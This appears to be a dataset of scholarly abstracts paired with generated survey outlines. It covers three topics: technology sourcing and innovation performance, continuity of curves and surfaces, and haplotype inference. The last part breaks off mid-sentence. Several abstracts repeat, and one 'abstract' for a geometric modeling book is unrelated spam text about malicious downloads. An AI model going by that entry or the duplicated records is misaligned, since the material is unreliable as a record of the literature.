time, as firms exit some markets while entering others. The transfer of resources due to market exit distinguishes our treatment of inter‐temporal economies of scope from standard intra‐temporal economies of scope. In addition, these inter‐temporal economies can benefit from a decentralized and modular organizational structure. This ability to obtain inter‐temporal economies of scope via organizational modularity and recombination suggests that corporations do not necessarily need a high degree of coordination between business units in order to benefit from a strategy of related diversification. Copyright © 2004 John Wiley & Sons, Ltd. --- paper_title: Profiting from technological innovation by others: The effect of competitor patenting on firm value paper_content: Abstract In 1986, Teece proposed a seminal framework for analyzing why innovators may fail to benefit from their innovations. He argued, in part, that firms with the requisite complementary assets can often expropriate an innovator's returns especially when appropriability regimes are weak. In this paper, we explore the implications of this framework from the perspective of an incumbent firm—more precisely, of investors in that firm—facing innovation by established corporate rivals and by inventors from outside its industry. We demonstrate that the financial-market value of publicly traded firms depends on patented innovation by competitors (both established rivals and industry outsiders). Our empirical study generates three main results. First, the financial-market value of an incumbent is negatively associated with “important” patenting by outside inventors. Second, in industries characterized by weak appropriability regimes or by a strong reliance on complementary assets, this relationship is reversed: important patenting by outsiders is positively associated with the incumbent's financial-market value. Third, the effect of outsiders’ patented innovation on the focal incumbent is qualitatively different than that of established rivals’ patented innovation on the incumbent. These results are consistent with implications of Teece [Teece, D., 1986. Profiting from Innovation, Research Policy] and with recently developed models that formalize elements of his framework. More generally, these results support theories about both the market-stealing and spillover effects of innovation. --- paper_title: Innovation objectives, knowledge sources, and the benefits of breadth paper_content: Given the inherent risk of innovative activity. firms can improve the odds of success by pursuing multiple parallel objectives. Because innovation draws on many sources of ideas, firms also may improve their odds of successful innovation by accessing a large number of knowledge sources. In this study, we conduct one of the first firm-level statistical analyses of the impact on innovation of breadth in both innovation objectives and knowledge sources. The empirical results suggest that broader horizons with respect to innovation objectives and knowledge sources are associated with successful innovation. We do not find diminishing returns to breadth in innovation objectives, which suggests that firms may tend to search too narrowly. We interpret these results in light of well-known cognitive biases toward searching in relatively familiar domains. Copyright (C) 2009 John Wiley & Sons, Ltd. --- paper_title: Technological Innovation and Acquisitions paper_content: I examine whether technological innovation is a motivating factor in firms' acquisition decisions and how an acquisition (or an acquisition withdrawal) affects technological innovation in subsequent years. I find that firms engaging in acquisition activities are less innovative and have often experienced declines in technological innovation during the years prior to the bid. Among the bidders, the relatively more innovative ones are less likely to complete a deal. During the three years after the bid, successful bidders do not underperform matching firms, whereas failed bidders significantly underperform their nonbidding peers. I further find that formerly less innovative bidders benefit more from acquisitions. These findings suggest that technological innovation affects firms' acquisition decisions, and in turn, acquisitions help firms' innovation efforts. --- paper_title: Mergers and acquisitions: Their effect on the innovative performance of companies in high-tech industries paper_content: This study examines the post-M&A innovative performance of acquiring firms in four major high-tech sectors. Non-technological M&As appear to have a negative impact on the acquiring firm's post-M&A innovative performance. With respect to technological M&As, a large relative size of the acquired knowledge base reduces the innovative performance of the acquiring firm. The absolute size of the acquired knowledge base only has a positive effect during the first couple of years after which the effect turns around and we see a negative effect on the innovative performance of the acquiring firm. The relatedness between the acquired and acquiring firms’ knowledge bases has a curvilinear impact on the acquiring firm's innovative performance. This indicates that companies should target M&A ‘partners’ that are neither too unrelated nor too similar in terms of their knowledge base. --- paper_title: Competitors' Resource-Oriented Strategies: Acting on Competitors' Resources Through Interventions in Factor Markets and Political Markets paper_content: In this paper, we argue that we can reach a better understanding of the relationships between firm resources and competitive advantage by considering actions that firms take against their rivals' resources in factor markets and political markets. We outline market and firm characteristics that facilitate the deployment of competitors' resource-oriented strategies. We then argue that the effectiveness of the firm's actions on its competitors' resources depends on the competitive responses of the competitors being attacked. --- paper_title: Technological acquisitions and the innovation performance of acquiring firms: a longitudinal study paper_content: This paper examines the impact of acquisitions on the subsequent innovation performance of acquiring firms in the chemicals industry. We distinguish between technological acquisitions, acquisitions in which technology is a component of the acquired firm's assets, and nontechnological acquisitions: acquisitions that do not involve a technological component. We develop a framework relating acquisitions to firm innovation performance and develop a set of measures for quantifying the technological inputs a firm obtains through acquisitions. We find that within technological acquisitions absolute size of the acquired knowledge base enhances innovation performance, while relative size of the acquired knowledge base reduces innovation output. The relatedness of acquired and acquiring knowledge bases has a nonlinear impact on innovation output. Nontechnological acquisitions do not have a significant effect on subsequent innovation output. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: The Performance of Incumbent firms in the Face of Radical Technological Innovation paper_content: A persistent theme in the academic literature on technological innovation is that incumbent enterprises have great difficulty crossing the abyss created by a radical technological innovation and, thus, go into decline, while new entrants rise to market dominance by exploiting the new technology. However, this tendency is not universal. There are outliers in any population, and much can be learned from examining this group. Here we identify a number of factors that help to explain incumbent performance in markets shaken by a radical technological innovation. --- paper_title: The endogenous relationship between innovation and diversification, and the impact of technological resources on the form of diversification paper_content: Abstract This research has endeavoured to build on earlier research on the relationship between a firm's technological resources and the direction of its diversification, by trying to confirm the endogeneity of this relationship and by addressing the influence of innovation on the choice of the mode of diversification. Based on a sample of Spanish firms, our results suggest that innovation drives diversification, but not the reverse. The second important finding of this research is the empirical confirmation that knowledge assets are not related to the diversification mode. --- paper_title: Technological acquisitions and the innovation performance of acquiring firms: a longitudinal study paper_content: This paper examines the impact of acquisitions on the subsequent innovation performance of acquiring firms in the chemicals industry. We distinguish between technological acquisitions, acquisitions in which technology is a component of the acquired firm's assets, and nontechnological acquisitions: acquisitions that do not involve a technological component. We develop a framework relating acquisitions to firm innovation performance and develop a set of measures for quantifying the technological inputs a firm obtains through acquisitions. We find that within technological acquisitions absolute size of the acquired knowledge base enhances innovation performance, while relative size of the acquired knowledge base reduces innovation output. The relatedness of acquired and acquiring knowledge bases has a nonlinear impact on innovation output. Nontechnological acquisitions do not have a significant effect on subsequent innovation output. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: Corporate diversification, coherence and economic performance paper_content: Within the diversification literature the concept of corporate coherence has been referred to as the ability of the firm to generate and explore synergies of various types. However, the empirical studies have insofar provided only approaches taking explicitly into account the product/market side of the phenomenon. The present paper operationalizes the concept of corporate coherence as a dynamic interconnectedness between the company's technological competencies and its downstream activities. It also provides some further empirical evidence on the widely discussed relationship between corporate diversification and performance. Specifically, it offers some (albeit rather weak) evidence that economic performance is positively influenced not by the degree of diversification per se, but by the ability of the company to increase its corporate coherence. Copyright 2004, Oxford University Press. --- paper_title: THE COMPETITIVE ADVANTAGE OF INTERCONNECTED FIRMS: AN EXTENSION OF THE RESOURCE-BASED VIEW. paper_content: In light of the increasing popularity of strategic alliances, the resource-based view is revisited and extended in order to allow for the consideration of alliance partner resources in evaluating the competitive advantage of interconnected firms. The proposed model distinguishes shared resources from non-shared resources and identifies four types of rents: (a) internal rents, (b) appropriated relational rents, (c) inbound spillover rents and (d) outbound spillover rents. The model illustrates how firm-specific, relation-specific, and partner-specific factors determine the contribution of partner resources to the rent streams that a firm can extract from its ego-network of alliances. --- paper_title: Does technological convergence imply convergence in markets? Evidence from the electronics industry paper_content: Abstract This paper uses data on new subsidiaries, acquisitions, collaborative agreements, and patents of the largest 32 US and European electronics firms during 1984–1992 to examine the relationships between technological and business diversification. We find that during the 1980s many firms focused on fewer businesses, but we find no evidence of greater technological focus. We argue that this is related to the fact that, in spite of technological convergence, electronics sectors still command highly industry- or even product-specific downstream assets. In addition, we find that business focus improved performance, but that better performance is also associated with greater technological diversification. We discuss some interpretation of this finding. --- paper_title: Corporate technology portfolios and R&D performance measures: a study of technology intensive firms paper_content: This paper examines the relations between technology portfolio strategies and five commonly used research and development (R&D) performance measures. Patent and financial data of 78 US-based technology companies from 1976 to 1995 were gathered and analysed to investigate how a well-managed technology portfolio can create synergy and affect R&D performance. A technology portfolio can be characterized by its composition and technology concentration. A valuable technology portfolio that consists of patents with higher average citation made and self-citation ratio can have a positive effect on firm value. Our findings suggest that large firms may enjoy advantages for technological innovation because they can exploit synergy effects of their technology portfolios. Technology concentration strategy does not work well because firms focusing on few technology fields can experience diseconomy to patents received since high-quality patents are increasingly difficult to obtain. This paper lays the groundwork for future empirical research on technology portfolio and R&D performance. --- paper_title: The Impact of Culture on the Strategy of Multinational Enterprises: Does National Origin Affect Ownership Decisions? paper_content: This paper tests the proposition that national origin affects the strategies of multinational enterprises by looking at the determinants of the choice they make between entering the United States through partially versus wholly owned subsidiaries. We pool entries into the United States made by firms based in two countries, Japan and Finland, which differ both in their cultural characteristics and in their cultural distance to the United States. After carefully controlling for the known firm and industry-level determinants of subsidiary ownership strategies, we find that cultural distance between the home base of the investor and the target country (or perhaps political risk) exerts a powerful influence on ownership of subsidiaries, but cultural characteristics of the home base do not. --- paper_title: SUBSIDIARIES AND KNOWLEDGE CREATION: THE INFLUENCE OF THE MNC AND HOST COUNTRY ON INNOVATION paper_content: This paper studies the influence of external knowledge on innovation in subsidiaries of multinational firms. The focus on subsidiaries is especially interesting since they are simultaneously embedded in two knowledge contexts: (a) the internal multinational corporation (MNC) comprised of the headquarters and other subsidiaries; and (b) an external environment of regional or host country firms. We develop hypotheses to suggest that the extent of influences of these contexts on subsidiary technological innovation depends on the characteristics of the knowledge network (technological richness and diversity) and the knowledge linkages of the subsidiary with other entities. The study uses patent citation data pertaining to innovations by foreign subsidiaries of U.S. semiconductor firms to test these hypotheses. The paper finds that (a) the technological richness of the MNC, (b) the subsidiary's knowledge linkages to host country firms, and (c) the technological diversity within the host country have a positive impact on innovation. Copyright © 2004 John Wiley & Sons, Ltd. --- paper_title: The Effect of Cultural Distance on Entry Mode Choice, International Diversification, and Mne Performance: A Meta-Analysis paper_content: Although a growing literature indicates that cultural distance – that is, differences between national cultures – is an important determinant of organizational actions and performance, both empirical and theoretical concerns abound. In this study, the relationships of cultural distance with entry mode choice, international diversification, and MNE performance are examined by meta-analyzing data from 66 independent samples, with cumulative sample sizes ranging from 2,255 to 24,152. Regression results failed to provide statistical evidence of significant relationships between cultural distance and entry mode choice, international diversification, and MNE performance. The examination of moderator effects, however, yielded important results. We found a strong negative association between cultural distance and entry mode choice for US-based MNEs. The cultural distance–international diversification relationship was negative for high-technology industries, while it was positive for other industries. Cultural distance also had a strong positive effect on MNE performance for developed country investments. A similar, strong positive relationship was found between cultural distance and international diversification in studies with more recent samples. Results of this study indicate that substantial additional research is needed before the role of cultural distance is fully understood. --- paper_title: An institution-based view of international business strategy: A focus on emerging economies paper_content: Leveraging the recent research interest in emerging economies, this Perspective paper argues that an institution-based view of international business (IB) strategy has emerged. It is positioned as one leg that helps sustain the “strategy tripod” (the other two legs consisting of the industry- and resource-based views). We then review four diverse areas of substantive research: (1) antidumping as entry barriers; (2) competing in and out of India; (3) growing the firm in China; and (4) governing the corporation in emerging economies. Overall, we argue that an institution-based view of IB strategy, in combination with industry- and resource-based views, will not only help sustain a strategy tripod, but also shed significant light on the most fundamental questions confronting IB, such as “What drives firm strategy and performance in IB?”Journal of International Business Studies (2008) 39, 920–936. doi:10.1057/palgrave.jibs.8400377 --- paper_title: Networks, Diversity, and Productivity: The Social Capital of Corporate R&D Teams paper_content: We argue that the debate regarding the performance implications of demographic diversity can be usefully reframed in terms of the network variables that reflect distinct forms of social capital. Scholars who are pessimistic about the performance of diverse teams base their view on the hypothesis that decreased network density--the average strength of the relationship among team members--lowers a team's capacity for coordination. The optimistic view is founded on the hypothesis that teams that are characterized by high network heterogeneity, whereby relationships on the team cut across salient demographic boundaries, enjoy an enhanced learning capability. We test each of these hypotheses directly and thereby avoid the problematic assumption that they contradict one another. Our analysis of data on the social networks, organizational tenure, and productivity of 224 corporate R&D teams indicates that both network variables help account for team productivity. These findings support a recasting of the diversity-performance debate in terms of the network processes that are more proximate to outcomes of interest. --- paper_title: Absorptive Capacity: A New Perspective on Learning and Innovation paper_content: Discusses the notion that the ability to exploit external knowledge is crucial to a firm's innovative capabilities. In addition, it is argued that the ability to evaluate and use outside knowledge is largely a function of the level of prior related knowledge--i.e., absorptive capacity. Prior research has shown that firms that conduct their own research and development (R&D) are better able to use information from external sources. Therefore, it is possible that the absorptive capacity of a firm is created as a byproduct of the firm's R&D investment. A simple model of firm R&D intensity is constructed in a broader context of what applied economists call the three classes of industry-level determinants of R&D intensity: demand, appropriability, and technological opportunity conditions. Several predictions are made, including the notions that absorptive capacity does have a direct effect on R&D spending and spillovers will provide a positive incentive to conduct R&D. All hypotheses are tested using cross-sectional survey data on technological opportunity and appropriability conditions--collected over the period 1975 to 1977 for 1,719 business units--in the American manufacturing sector from Levin et al. (1983, 1987) and the Federal Trade Commission's Line of Business Program data on business unit sales, transfers, and R&D expenditures. Results confirm that firms are sensitive to the characteristics of the learning environment in which they operate and that absorptive capacity does appear to be a part of a firm's decisions regarding resource allocation for innovative activity. Results also suggest that, although the analysis showing a positive effect of spillovers in two industry groups do not represent a direct test of the model, positive absorption incentive associated with spillovers may be sufficiently strong in some cases to more than offset the negative appropribility incentive. (SFL) --- paper_title: In Search of Complementarity in the Innovation Strategy : Internal R & D and External Knowledge Acquisition paper_content: Empirical research on complementarity between organizational design decisions has traditionally focused on the question of existence of complementarity. In this paper, we take a broader approach to the issue, combining a productivity and an adoption approach, while including a search for contextual variables in the firms strategy that affects complementarity. Analysis of contextual variables is not only interesting per se, but also improves the productivity test for the existence of complementarity. We use our empirical methodology to analyze complementarity between innovation activities: internal research and development (R&D) and external knowledge acquisition. Our results suggest that internal R&D and external knowledge acquisition are complementary innovation activities, but that the degree of complementarity is sensitive to other elements of the firms strategic environment. We identify reliance on basic R&Dthe importance of universities and research centers as an information source for the innovation processas an important contextual variable affecting complementarity between internal and external innovation activities. --- paper_title: IS THERE COMPLEMENTARITY OR SUBSTITUTABILITY BETWEEN INTERNAL AND EXTERNAL R & D STRATEGIES ? paper_content: The mixed picture of extant research on the relationship between internal and external R&D prompts us to ask such a question: under what conditions is there complementarity or substitutability between different R&D strategies? The goal of this paper is to contribute to the empirical literature by advancing and testing the contingency of the relationship between internal and external R&D strategies in shaping firms‘ innovative output. Using a panel sample of incumbent pharmaceutical firms covering the period 1986-2000, our empirical analysis suggests that the level of in-house R&D investments, which is characterized by decreasing marginal returns, is a contingency variable that critically influences the nature of the link between internal and external R&D strategies. In particular, internal R&D and external R&D, through either R&D alliances or R&D acquisitions, turn out to be complementary innovation activities at higher levels of in-house R&D investments, whereas at lower levels of in-house R&D efforts internal and external R&D are substitutive strategic options. These findings are robust to alternative specifications and estimation techniques, including a dynamic perspective on firm innovative performance. --- paper_title: When Do Relational Resources Matter? Leveraging Portfolio Technological Resources for Breakthrough Innovation paper_content: We examine the paradox of capabilities: although portfolio resources contribute to innovation success, and technologically capable firms have the ability to gain more such resources, firms' “competency traps” and the tension between value creation and value protection reduce benefits from portfolio resources for such firms. Results show that the quality and diversity of portfolio technological resources contribute to breakthrough innovation. The benefits are greater for firms with low internal strength and low internal diversity, thus suggesting positive synergy between portfolio and internal resources for such firms. Technologically strong firms, however, benefit from the quality of their portfolio resources when they overcome some of their competency traps. --- paper_title: Towards an open R&D system: Internal R&D investment, external knowledge acquisition and innovative performance paper_content: To cope with fast-changing business environments, firms are increasingly opening up their organizational boundaries to tap into external source of knowledge. By restructuring their R&D system, firms face the challenge of balancing internal and external R&D activities to profit from external knowledge. This paper examines the influence of R&D configuration on innovative performance and the moderating role of a firm's R&D capacity. --- paper_title: Innovation Management Measurement: A Review paper_content: Measurement of the process of innovation is critical for both practitioners and academics, yet the literature is characterized by a diversity of approaches, prescriptions and practices that can be confusing and contradictory. Conceptualized as a process, innovation measurement lends itself to disaggregation into a series of separate studies. The consequence of this is the absence of a holistic framework covering the range of activities required to turn ideas into useful and marketable products. We attempt to address this gap by reviewing the literature pertaining to the measurement of innovation management at the level of the firm. Drawing on a wide body of literature, we first develop a synthesized framework of the innovation management process consisting of seven categories: inputs management, knowledge management, innovation strategy, organizational culture and structure, portfolio management, project management and commercialization. Second, we populate each category of the framework with factors empirically demonstrated to be significant in the innovation process, and illustrative measures to map the territory of innovation management measurement. The review makes two important contributions. First, it takes the difficult step of incorporating a vastly diverse literature into a single framework. Second, it provides a framework against which managers can evaluate their own innovation activity, explore the extent to which their organization is nominally innovative or whether or not innovation is embedded throughout their organization, and identify areas for improvement. --- paper_title: Measuring innovative performance: is there an advantage in using multiple indicators? paper_content: Abstract The innovative performance of companies has been studied quite extensively and for a long period of time. However, the results of many studies have not yet led to a generally accepted indicator of innovative performance or a common set of indicators. So far the variety in terms of constructs, measurements, samples, industries and countries has been substantial. This paper studies the innovative performance of a large international sample of nearly 1200 companies in four high-tech industries, using a variety of indicators. These indicators range from R&D inputs, patent counts and patent citations to new product announcements. The study establishes that a composite construct based on these four indicators clearly catches a latent variable ‘innovative performance’. However, our findings also suggest that the statistical overlap between these indicators is that strong that future research might also consider using any of these indicators to measure the innovative performance of companies in high-tech industries. --- paper_title: External technology sourcing and innovation performance in LMT sectors: An analysis based on the Taiwanese Technological Innovation Survey paper_content: This paper presents the strategies that low- and medium-technology (LMT) firms adopt to generate technological innovation and investigates the impact of these approaches on the firms' innovation performances. These analyses are based on a sample from the Taiwanese Technological Innovation Survey totalling 753 LMT firms. The descriptive statistics show that about 95% of the firms acquired technology by technology licensing, while 32% of the firms engaged in R&D outsourcing. The firms in the sample acquiring external technological knowledge through collaboration with suppliers, clients, competitors, and research organizations are about 20%, 18%, 8%, and 23%, respectively. Using a moderated hierarchical regression analysis, this study reveals interesting results. First, inward technology licensing does not contribute significantly to innovation performance. Second, internal R&D investment negatively moderates the effect of R&D outsourcing on innovation performance. Third, internal R&D investment contingently impacts the different types of partners on innovation performance: by collaborating with different types of partners, firms with more internal R&D investment gain higher innovation returns than firms with fewer internal R&D activities. The results of this study contribute to a sharper understanding of technological innovation strategies and their effects on technological innovation performance in LMT sectors. --- paper_title: In Search of Complementarity in the Innovation Strategy : Internal R & D and External Knowledge Acquisition paper_content: Empirical research on complementarity between organizational design decisions has traditionally focused on the question of existence of complementarity. In this paper, we take a broader approach to the issue, combining a productivity and an adoption approach, while including a search for contextual variables in the firms strategy that affects complementarity. Analysis of contextual variables is not only interesting per se, but also improves the productivity test for the existence of complementarity. We use our empirical methodology to analyze complementarity between innovation activities: internal research and development (R&D) and external knowledge acquisition. Our results suggest that internal R&D and external knowledge acquisition are complementary innovation activities, but that the degree of complementarity is sensitive to other elements of the firms strategic environment. We identify reliance on basic R&Dthe importance of universities and research centers as an information source for the innovation processas an important contextual variable affecting complementarity between internal and external innovation activities. --- paper_title: The influence of corporate acquisitions on the behaviour of key inventors paper_content: The behaviour of key inventors after the acquisition of their company is examined. Key inventors are identified on the basis of their patenting output. They account for a large number of their company?s high-quality patents. The analysis of 43 acquisitions shows that key inventors leave to a substantial extent their company or they significantly reduce their patenting performance after the acquisition. Factors influencing the behaviour of key inventors after acquisitions are identified. Implications for the effective management of acquisitions as well as suggestions for further research are outlined. --- paper_title: Internationalization of innovation systems: A survey of the literature ☆ paper_content: While there is a large literature on the internationalization of economic activity (including R&D) at the corporate level, there are not many studies of the degree of internationalization of innovation systems. The few studies that exist show that national innovation systems are becoming internationalized, even if the institutions that support them remain country-specific. To the extent that the far more numerous studies of internationalization of corporate R&D discuss innovation systems at all, they point to the continued importance of national institutions to support innovative activity, even though that activity is itself becoming increasingly internationalized. © 2005 Elsevier B.V. All rights reserved. --- paper_title: COLLABORATION NETWORKS, STRUCTURAL HOLES AND INNOVATION: A LONGITUDINAL STUDY. paper_content: I find that a firm's innovation output increases with the number of collaborative linkages maintained by it, the number of structural holes it spans, and the number of partners of its partners. However, innovation is negatively related to the interaction between spanning many structural holes and having partners with many partners. --- paper_title: Dynamic capabilities: what are they? paper_content: Seeks to present a better understanding of dynamic capabilities and the resource-based view of the firm. Dynamic capabilities are considered to be the "organizational and strategic routines by which firms achieve new resource configurations." Dynamic capabilities are identifiable and specific routines that can serve different purposes, including integrating resources, reconfiguring resources within firms, and guiding the gain and release of resources. Various examples such as the product development process and alliancing, are discussed. Commonalities related to effective dynamic capabilities can be seen across firms though this does not mean that these capabilities are exactly alike. The dynamism of the market can impact the sustainability of the dynamic capabilities and the causal ambiguity of these capabilities. Moderately dynamic markets see robust, grooved routine, while high velocity markets experience simple rules and real-knowledge creation. The evolution of these dynamic capabilities within a firm are unique but the firm's individual path is shaped by well-known learning mechanisms. Competitive advantage does not lie in the dynamic capabilities themselves but rather in the resource configurations that managers build using these dynamic capabilities. (SRD) --- paper_title: Mergers and acquisitions: Their effect on the innovative performance of companies in high-tech industries paper_content: This study examines the post-M&A innovative performance of acquiring firms in four major high-tech sectors. Non-technological M&As appear to have a negative impact on the acquiring firm's post-M&A innovative performance. With respect to technological M&As, a large relative size of the acquired knowledge base reduces the innovative performance of the acquiring firm. The absolute size of the acquired knowledge base only has a positive effect during the first couple of years after which the effect turns around and we see a negative effect on the innovative performance of the acquiring firm. The relatedness between the acquired and acquiring firms’ knowledge bases has a curvilinear impact on the acquiring firm's innovative performance. This indicates that companies should target M&A ‘partners’ that are neither too unrelated nor too similar in terms of their knowledge base. --- paper_title: Toward a knowledge‐based theory of the firm paper_content: Given assumptions about the characteristics of knowledge and the knowledge requirements of production, the firm is conceptualized as an institution for integrating knowledge. The primary contribution of the paper is in exploring the coordination mechanisms through which firms integrate the specialist knowledge of their members. In contrast to earlier literature, knowledge is viewed as residing within the individual, and the primary role of the organization is knowledge application rather than knowledge creation. The resulting theory has implications for the basis of organizational capability, the principles of organization design (in particular, the analysis of hierarchy and the distribution of decision-making authority), and the determinants of the horizontal and vertical boundaries of the firm. More generally, the knowledge-based approach sheds new light upon current organizational innovations and trends and has far-reaching implications for management practice. ---
Title: The impact of internal and external technology sourcing on innovation performance: a review and research agenda Section 1: Introduction Description 1: Introduce the importance of innovation performance in building a firm’s competitive advantage and the roles of internal and external technology sourcing. Section 2: Review methodology and organising framework Description 2: Explain the systematic review methodology and the framework used to organise the literature review. Section 3: Internal technology sourcing as an antecedent of innovation performance Description 3: Discuss the impact of internal technology sourcing on innovation performance, including the debates on specialization vs. diversification and decentralization vs. centralization of technological knowledge. Section 4: External technology sourcing as an antecedent of innovation performance Description 4: Examine the role of external technology sourcing, specifically strategic alliances and mergers & acquisitions, in influencing innovation performance, and the effect of absorptive capacity as a moderator. Section 5: Impact of the interplay between internal and external technology sourcing on innovation performance Description 5: Discuss the complementary nature of internal and external technology sourcing and the impacts on innovation performance. Section 6: Operational measures of concepts Description 6: Review the various indicators and measures used in empirical studies to assess internal and external technology sourcing and innovation performance. Section 7: Levels of analysis Description 7: Highlight the different levels of analysis (individual, firm, network, industry, country) in the study of innovation performance and suggest the need for multilevel approaches. Section 8: Time effect Description 8: Discuss the temporal dimension in the relationships studied, including the long-term impacts of technological sourcing strategies on innovation performance. Section 9: Directions for future research Description 9: Identify gaps and suggest future research avenues on the topics of technology relatedness, market relatedness, strategic alliances, the interaction between internal and external sourcing, and longitudinal analyses. Section 10: Conclusions Description 10: Summarize the findings of the literature review, the importance of internal and external technology sourcing, and the recommended areas for further research.
Survey of Continuities of Curves and Surfaces
6
--- paper_title: Geometric continuity of parametric curves: constructions of geometrically continuous splines paper_content: Some observations are made concerning the source and nature of shape parameters. It is then described how Bezier curve segments can be stitched together with G/sup 1/ or G/sup 2/ continuity, using geometric constructions. These constructions lead to the development of geometric constructions for quadratic G/sup 1/ and cubic G/sup 2/ Beta-splines. A geometrically continuous subclass of Catmull-Rom splines based on geometric continuity and possessing shape parameters is discussed. > --- paper_title: Geometric continuity of parametric curves: three equivalent characterizations paper_content: Some of the important basic results on geometric continuity of curves are presented in a self-contained manner. The paper covers parametric representation and smoothness, parametric continuity, reparameterization and equivalent parameterization, beta-constraints, and arc-length parameterization. > --- paper_title: Scattered Data Interpolation in Three or More Variables paper_content: This is a survey of techniques for the interpolation of scattered data in three or more independent variables. It covers schemes that can be used for any number of variables as well as schemes specifically designed for three variables. Emphasis is on breadth rather than depth, but there are explicit illustrations of different techniques used in the solution of multivariate interpolation problems. --- paper_title: Scattered Data Interpolation in Three or More Variables paper_content: This is a survey of techniques for the interpolation of scattered data in three or more independent variables. It covers schemes that can be used for any number of variables as well as schemes specifically designed for three variables. Emphasis is on breadth rather than depth, but there are explicit illustrations of different techniques used in the solution of multivariate interpolation problems. --- paper_title: Computer Aided Geometric Design. paper_content: Abstract : The purpose of this contract was to develop and apply subdivision techniques to Computer Aided Geometric Design, using the conceptual key based on the theory of discrete splines in the Oslo Algorithm computational engine. The basic validity of the theory and algorithms were established by the development of new modeling, graphical, and interactive schemes based on them and also the use of many of these ideas by other researchers and the use of the published results by industry. Related new theory and algorithms were developed; the mathematical model was extended. New styles of modeling were proposed and theory and algorithms for graphics and modeling of nonrectangular surface generalizations were developed. The role of graphics in design and modeling as a tool has been considered. --- paper_title: Algebraic aspects of geometric continuity paper_content: Let C ( M , τ) denote the set of all scalar valued functions with connection matrix M at τ. We show that C ( M , τ) is closed under multiplication and division if and only if M is a reparametrization matrix. We conclude that reparametrization is the most general form of geometric continuity for which the shape parameters remain invariant under lifting and projection. We go on to show that Frenet frame continuity is also invariant under projection, even though the shape parameters are not preserved. We also investigate curves which are not smooth, but which become smooth under projection. --- paper_title: Curvature continuous curves and surfaces paper_content: Abstract The well-known construction of the Bezier points of a cubic spline curve or surface is generalized to curvature continuous curves and surfaces. Special examples of this kind of new splines are Nu-splines and Beta-splines. --- paper_title: Scattered Data Interpolation in Three or More Variables paper_content: This is a survey of techniques for the interpolation of scattered data in three or more independent variables. It covers schemes that can be used for any number of variables as well as schemes specifically designed for three variables. Emphasis is on breadth rather than depth, but there are explicit illustrations of different techniques used in the solution of multivariate interpolation problems. --- paper_title: Explicit continuity conditions for adjacent Bézier surface patches paper_content: Abstract Liu and Hoschek recently gave necessary and sufficient conditions for G 1 -continuity of two adjacent Bezier surface patches. In this paper, not only the common edge but also the position of the tangent planes at its points are considered to be given. Then one obtains by algebraic methods explicit representations of the first order cross-boundary tangent vectors of the two patches. These methods can be extended to the G 2 case. In combination with new results of J. Hahn, a complete and explicit solution is derived for G 2 -continuity too. --- paper_title: Scattered Data Interpolation in Three or More Variables paper_content: This is a survey of techniques for the interpolation of scattered data in three or more independent variables. It covers schemes that can be used for any number of variables as well as schemes specifically designed for three variables. Emphasis is on breadth rather than depth, but there are explicit illustrations of different techniques used in the solution of multivariate interpolation problems. --- paper_title: Computer Aided Geometric Design. paper_content: Abstract : The purpose of this contract was to develop and apply subdivision techniques to Computer Aided Geometric Design, using the conceptual key based on the theory of discrete splines in the Oslo Algorithm computational engine. The basic validity of the theory and algorithms were established by the development of new modeling, graphical, and interactive schemes based on them and also the use of many of these ideas by other researchers and the use of the published results by industry. Related new theory and algorithms were developed; the mathematical model was extended. New styles of modeling were proposed and theory and algorithms for graphics and modeling of nonrectangular surface generalizations were developed. The role of graphics in design and modeling as a tool has been considered. --- paper_title: Computer Aided Geometric Design. paper_content: Abstract : The purpose of this contract was to develop and apply subdivision techniques to Computer Aided Geometric Design, using the conceptual key based on the theory of discrete splines in the Oslo Algorithm computational engine. The basic validity of the theory and algorithms were established by the development of new modeling, graphical, and interactive schemes based on them and also the use of many of these ideas by other researchers and the use of the published results by industry. Related new theory and algorithms were developed; the mathematical model was extended. New styles of modeling were proposed and theory and algorithms for graphics and modeling of nonrectangular surface generalizations were developed. The role of graphics in design and modeling as a tool has been considered. --- paper_title: Geometric Modeling Algorithms And New Trends paper_content: Thank you very much for downloading geometric modeling algorithms and new trends. Maybe you have knowledge that, people have look numerous times for their favorite readings like this geometric modeling algorithms and new trends, but end up in malicious downloads. Rather than reading a good book with a cup of coffee in the afternoon, instead they juggled with some infectious virus inside their computer. --- paper_title: Scattered Data Interpolation in Three or More Variables paper_content: This is a survey of techniques for the interpolation of scattered data in three or more independent variables. It covers schemes that can be used for any number of variables as well as schemes specifically designed for three variables. Emphasis is on breadth rather than depth, but there are explicit illustrations of different techniques used in the solution of multivariate interpolation problems. ---
Title: Survey of Continuities of Curves and Surfaces Section 1: Introduction Description 1: Provide an overview of the importance of continuity in curves and surfaces, and state the purpose and structure of the paper. Section 2: Continuity of Curves Description 2: Discuss the fundamental concepts and different types of continuity (parametric, geometric, Frenet frame, tangent surface) in the context of curves. Section 3: Continuity of Surfaces Description 3: Explore the various types of continuity as applied to surfaces, including parametric and geometric continuity. Section 4: Modeling Description 4: Explain how continuity concepts apply to curve and surface modeling, including specific types of splines and patches. Section 5: Visual Aspects of Continuity Description 5: Relate the notions of continuity to visual effects in rendering, illumination models, and shading algorithms. Section 6: Conclusions Description 6: Summarize the key points of the survey, highlighting the different notions of continuity, their implications for modeling, and their relationship to rendering and perception.
An Overview of Combinatorial Methods for Haplotype Inference
19
--- paper_title: Haplotype Inference in Random Population Samples paper_content: Contemporary genotyping and sequencing methods do not provide information on linkage phase in diploid organisms. The application of statistical methods to infer and reconstruct linkage phase in samples of diploid sequences is a potentially time- and labor-saving method. The Stephens-Smith-Donnelly (SSD) algorithm is one such method, which incorporates concepts from population genetics theory in a Markov chain-Monte Carlo technique. We applied a modified SSD method, as well as the expectation-maximization and partition-ligation algorithms, to sequence data from eight loci spanning >1 Mb on the human X chromosome. We demonstrate that the accuracy of the modified SSD method is better than that of the other algorithms and is superior in terms of the number of sites that may be processed. Also, we find phase reconstructions by the modified SSD method to be highly accurate over regions with high linkage disequilibrium (LD). If only polymorphisms with a minor allele frequency >0.2 are analyzed and scored according to the fraction of neighbor relations correctly called, reconstructions are 95.2% accurate over entire 100-kb stretches and are 98.6% accurate within blocks of high LD. --- paper_title: Inference of haplotypes from PCR-amplified samples of diploid populations. paper_content: Direct sequencing of genomic DNA from diploid individuals leads to ambiguities on sequencing gels whenever there is more than one mismatching site in the sequences of the two orthologous copies of a gene. While these ambiguities cannot be resolved from a single sample without resorting to other experimental methods (such as cloning in the traditional way), population samples may be useful for inferring haplotypes. For each individual in the sample that is homozygous for the amplified sequence, there are no ambiguities in the identification of the allele’s sequence. The sequences of other alleles can be 